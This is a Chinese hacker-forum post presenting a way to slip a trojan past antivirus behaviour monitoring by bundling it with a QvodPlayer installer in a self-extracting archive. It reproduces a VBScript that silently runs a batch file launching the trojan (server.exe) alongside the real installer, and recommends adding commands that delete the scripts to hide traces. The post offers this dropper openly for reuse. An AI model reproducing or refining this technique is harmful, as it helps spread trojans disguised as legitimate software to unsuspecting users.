免---杀过2010主动和行为的方法

第三代杀软的主动和行为厉害的没法说，其实不少大牛其实都找到了方法。只是没放出来，小凉谭通过小熊的指引说是一个bat就能搞定。机缘巧合，在登录97ai。com的时候发现他上面有个网址发部器，一看当然知道是木马啦 ，就下了下来是个exe的自解压，拿到虚拟机上解压了一下，发现释放了四个文件，一个是快播的播放器，一个是木马，一个是名为setup.bat的文件，一个是名为setup.vbs的文件，看了一下啊。发现他首先把四个文件都解压到windows目录下，首先运行setup.vbs，通过这个文件调用setup.bat,再通过bat运行播放器和木马。反正留着也没用就发出来共享一下 。
以下是两个主要文件的内容：
setup.bat内容如下
@echo off
server.exe-----------------------------------------------这个是木马名
QvodSetupPlus3.exe------------------------这个是快播安装文件

 

 

setup.vbs内容如下
On Error Resume Next
Dim oShell
Set oShell= WScript.CreateObject("WScript.Shell")
a = oShell.Run ("c:\windows\setup.BAT",0)
（这个vbs就是运行bat用的。但我也不明白什么意思？在新手讨论区发了个帖子。很快得到了回答，在这里要感谢一下咱们暗组中的shedream）
说明如下：
On Error Resume Next        '如果有错误则进行下一句
Dim oShell        '声明变量
Set oShell= WScript.CreateObject("WScript.Shell")        '创建一个WScript.shell对象
a = oShell.Run ("",0)        '打开一个可执行文件,""号内为程序路径

 

 

setup.bat内容如下
@echo off
server.exe-----------------------------------------------这个是木马名
QvodSetupPlus3.exe------------------------这个是快播安装文件
这里 在 加入
del setup.bat
del setup.vbs
比较好点